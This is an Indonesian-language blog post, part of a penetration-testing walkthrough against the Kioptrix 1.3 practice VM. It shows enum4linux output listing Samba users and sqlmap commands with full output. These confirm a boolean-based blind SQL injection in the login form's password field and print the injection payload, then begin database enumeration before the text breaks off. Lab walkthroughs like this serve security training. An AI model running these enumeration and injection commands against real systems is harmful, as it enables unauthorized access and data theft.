Penetration Testing Kioptrix Server 1.3: Enumerating Samba, SSH dan HTTP [2]

hacking Jan 03, 2020

Enumeration biasa dikenal dengan vulnerability scanning. Yaitu untuk melakukan percobaan dan mencari informasi celah keamanan yang mungkin ada pada server Kioptrix.

Pada step pertam telah diketahui service dan port terbuka apa saja. Salah satunya adalah sambah. Sekarang kita akan melakukan enumeration pada samba server Kioptrix. Dengan bantuan tool enum4linux.

  1. Jalankan perintah enum4linux pada terminal.
enum4linux 192.168.56.117

hasil nya akan seperti ini :

killu@kalidata:~$ enum4linux 192.168.56.117
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jan  2 10:11:02 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.56.117
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.56.117    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.56.117    |
 ============================================== 
Looking up status of 192.168.56.117
	KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
	KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
	KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

	MAC Address = 00-00-00-00-00-00

 ======================================= 
|    Session Check on 192.168.56.117    |
 ======================================= 
[+] Server 192.168.56.117 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.56.117    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.56.117    |
 ======================================== 
[+] Got OS info for 192.168.56.117 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.56.117 from srvinfo:
	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	4.9
	server type     :	0x809a03

 =============================== 
|    Users on 192.168.56.117    |
 =============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

 =========================================== 
|    Share Enumeration on 192.168.56.117    |
 =========================================== 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))

	Server               Comment
	---------            -------
	KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.56.117
//192.168.56.117/print$	Mapping: DENIED, Listing: N/A
//192.168.56.117/IPC$	[E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

 ====================================================== 
|    Password Policy Information for 192.168.56.117    |
 ====================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
  File "/usr/bin/polenum", line 33, in <module>
    from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================ 
|    Groups on 192.168.56.117    |
 ================================ 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================= 
|    Users on 192.168.56.117 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-502 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-503 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-504 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-505 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-506 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-507 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-508 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-509 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-510 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-511 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-512 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-514 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-515 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-516 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-517 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-518 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-519 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-520 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-521 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-522 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-523 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-524 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-525 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-526 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-527 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-528 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-529 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-530 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-531 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-532 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-533 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-534 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-535 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-536 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-537 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-538 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-539 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-540 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-541 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-542 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-543 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-544 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-545 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-546 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-547 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-548 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-549 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-550 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
S-1-5-21-2529228035-991147148-3991031631-1001 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1002 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1003 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1004 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1005 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1006 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1007 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1008 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1009 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1010 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1011 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1012 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1013 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1014 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1015 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1016 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1017 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1018 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1019 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1020 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1021 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1022 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1023 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1024 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1025 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1026 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1027 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1028 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1029 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1030 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1031 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1032 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1033 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1034 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1035 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1036 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1037 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1038 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1039 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1040 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1041 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1042 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1043 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1044 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1045 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1046 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1047 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1048 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1049 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1050 *unknown*\*unknown* (8)

 =============================================== 
|    Getting printer info for 192.168.56.117    |
 =============================================== 
No printers returned.


enum4linux complete on Thu Jan  2 10:11:21 2020

yang perlu kita perhatikan adalah bagian ini :

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

Keterangan :
dari hasil diatas didapat name user pada server tersebut.

  1. Selanjutnya masuk tahap enumeration httpd yang mana untuk mencari password yang valid untuk login dengan cara SQL Injection.

  2. Pada step sebelumnya kita telah akses http dari server Kioptrix. Seperti gambar dibawah ini.
    DeepinScreenshot_select-area_20200102213821-1

  3. Masukan pada bagian username = admin dan pada bagian password ' (hanya tanda petik 1 pada kolom password), lalu submit. Maka akan muncul error SQL seperti gambar dibawah ini.
    DeepinScreenshot_select-area_20200102235824
    Yang menandakan bahwa kolom password memiliki celah keamanan pada query sql.

  4. Selanjutnya kita lakukan SQL injection pada kolom password dengan bantuan tool sqlmap.

  5. Jalankan perintah dibawah ini pada terminal:

sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3

Hasil yang didapat adalah seperti dibawah ini :

killu@kalidata:~$ sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3
[sudo] password for killu: 
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201604230a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:04:59

[11:04:59] [INFO] testing connection to the target URL
[11:04:59] [INFO] heuristics detected web page charset 'ascii'
[11:04:59] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:04:59] [INFO] testing if the target URL is stable
[11:05:00] [INFO] target URL is stable
[11:05:00] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[11:05:00] [INFO] testing for SQL injection on POST parameter 'mypassword'
[11:05:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:05:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
sqlmap got a 302 redirect to 'http://192.168.56.117:80/login_success.php?username=admin'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[11:06:26] [INFO] POST parameter 'mypassword' seems to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[11:06:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:06:26] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:06:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:06:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:06:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:06:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:06:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:06:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[11:06:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:06:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[11:06:27] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:06:27] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[11:06:27] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[11:06:27] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:06:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:06:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:06:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:06:27] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:06:27] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:06:27] [INFO] testing 'MySQL inline queries'
[11:06:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[11:06:27] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:06:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[11:06:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:06:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:06:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:06:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:06:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[11:06:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[11:06:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[11:06:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[11:06:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[11:06:49] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[11:06:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[11:06:59] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[11:07:09] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[11:07:14] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[11:07:20] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[11:07:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[11:07:34] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[11:07:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT - comment)'
[11:07:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:07:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:07:44] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:07:44] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:07:54] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:07:54] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:08:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:08:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:08:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:08:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT)'
[11:08:04] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[11:08:04] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:08:04] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:08:04] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:08:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:08:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:08:09] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[11:08:24] [INFO] testing 'Generic UNION query (41) - 22 to 40 columns'
[11:08:25] [INFO] testing 'Generic UNION query (41) - 42 to 60 columns'
[11:08:26] [INFO] testing 'Generic UNION query (41) - 62 to 80 columns'
[11:08:26] [INFO] testing 'Generic UNION query (82) - 82 to 100 columns'
[11:08:27] [INFO] testing 'MySQL UNION query (41) - 1 to 20 columns'
[11:08:28] [INFO] testing 'MySQL UNION query (41) - 22 to 40 columns'
[11:08:28] [INFO] testing 'MySQL UNION query (41) - 42 to 60 columns'
[11:08:28] [INFO] testing 'MySQL UNION query (41) - 62 to 80 columns'
[11:08:28] [INFO] testing 'MySQL UNION query (82) - 82 to 100 columns'
[11:08:28] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[11:08:28] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 429 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-7775' OR 1477=1477 AND 'InhH'='InhH
---
[11:08:37] [INFO] testing MySQL
[11:08:37] [INFO] confirming MySQL
[11:08:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[11:08:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.117'

[*] shutting down at 11:08:37

Kesimpulan :
Dari hasil tersebut dapat diketahui bahwa kolom pada password memang memiliki celah keamaan.

  1. Selanjutnya kita coba temukan database dengan perintah seperti dibawah ini :
sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3 --dbs

Hasil yang didapat adalah :

killu@kalidata:~$ sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201604230a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:14:56

[11:14:56] [INFO] testing connection to the target URL
[11:14:56] [INFO] heuristics detected web page charset 'ascii'
